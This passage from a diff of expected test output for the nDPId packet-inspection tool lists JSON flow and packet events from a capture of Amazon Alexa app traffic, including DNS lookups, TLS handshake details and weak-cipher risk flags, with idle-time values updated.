{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041156,"flow_last_seen":1490976041279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976041279,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041384,"flow_last_seen":1490976041384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041384,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1490976041384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041384,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807JAAEAGczysECrYNF7ohrJeAbv1uZ3IAAAAAKAC\/\/+9JQAAAgQFtAQCCAoA9k56AAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041400,"flow_last_seen":1490976041400,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041400,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1490976041400,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041400,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ul5AAEAGjJCsECrYNF7ohrJfAburivQiAAAAAKAC\/\/+w9wAAAgQFtAQCCAoA9k58AAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041428,"flow_last_seen":1490976041428,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041428,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1490976041428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041428,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G65AAEAGvmusECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/V3gAAAgQFtAQCCAoA9k5+AAAAAAEDAwg="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041434,"flow_last_seen":1490976041434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1490976041434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041434,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hqRAAEAGEYasECrYwKgLAZX3H5Abo8jbAAAAAKAC\/\/+78QAAAgQFtAQCCAoA9k5\/AAAAAAEDAwg="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1490976041437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976041437,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QlfcAAAAAG6PI3FAUAABzNwAAAAAAAAAA"} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1490976041439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041439,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwm7lAAOcGBEE0XuiGrBAq2AG7sl5u82R89bmdyXASH\/5VMQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1490976041440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07NAAEAGc0+sECrYNF7ohrJeAbv1uZ3JbvNkfVAQAVefogAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041384,"flow_last_seen":1490976041444,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1490976041446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041446,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwNmhAAOcGaZI0XuiGrBAq2AG7sl88IzNAq4r0I3ASH\/6tEQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1490976041447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041447,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoul9AAEAGjKOsECrYNF7ohrJfAburivQjPCMzQVAQAVf3ggAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041400,"flow_last_seen":1490976041448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041400,"flow_last_seen":1490976041498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041498,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041384,"flow_last_seen":1490976041502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041680,"flow_last_seen":1490976041680,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1490976041680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzJAAEAGfuesECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9j3AAAAgQFtAQCCAoA9k6YAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1490976041770,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976041770,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWlRAAEARM0qsECrYrBAqAVOPADUAQZgzlqMBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} 00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -175,35 +175,35 @@ 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1490976041866,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976041866,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl0nZAAEARuxesECoBrBAq2AA1U48AUSKClqOBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAOQAENu8Yug=="} 00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976041866,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.186"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041870,"flow_last_seen":1490976041870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1490976041870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041870,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YDpAAEAGs\/CsECrYNu8YuoTjAbvEzS6RAAAAAKAC\/\/9XzwAAAgQFtAQCCAoA9k6rAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041870,"flow_last_seen":1490976041870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1490976041870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041870,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YDpAAEAGs\/CsECrYNu8YuoTjAbvEzS6RAAAAAKAC\/\/9XzwAAAgQFtAQCCAoA9k6rAAAAAAEDAwg="} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1490976041938,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976041938,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC90nlAAEARurysECoBrBAq2AA1y20AqYS4a+qBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAABMAAoDd3d3A2NkbsAQwCwABQABAAAA+AAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAgABDRV0djAQgABAAEAAAAIAAQ0VdHFwEIAAQABAAAACAAENFXRj8BCAAEAAQAAAAgABDRV0Xo="} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976041938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041942,"flow_last_seen":1490976041942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1490976041942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BJdAAEAGWQ+sECrYNFXR2NSLAbvD9kolAAAAAKAC\/\/823gAAAgQFtAQCCAoA9k6yAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1490976041952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041952,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwusBAAOcGsnU27xi6rBAq2AG7hOPN4I6FxM0uknASH\/5nFQAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1490976041953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041953,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYDtAAEAGtAOsECrYNu8YuoTjAbvEzS6SzeCOhlAQAVexhgAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041961,"flow_last_seen":1490976041961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041961,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1490976041961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041961,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8261AAEAGgfisECrYNFXR2NSMAbsYT5UZAAAAAKAC\/\/+XjgAAAgQFtAQCCAoA9k60AAAAAAEDAwg="} 
-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041870,"flow_last_seen":1490976041962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976041962,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1490976041989,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041989,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iuwz0jww\/ZKJqAScSDA4QAAAgQFtAQCCAptm51vAPZOsgEDAwg="} 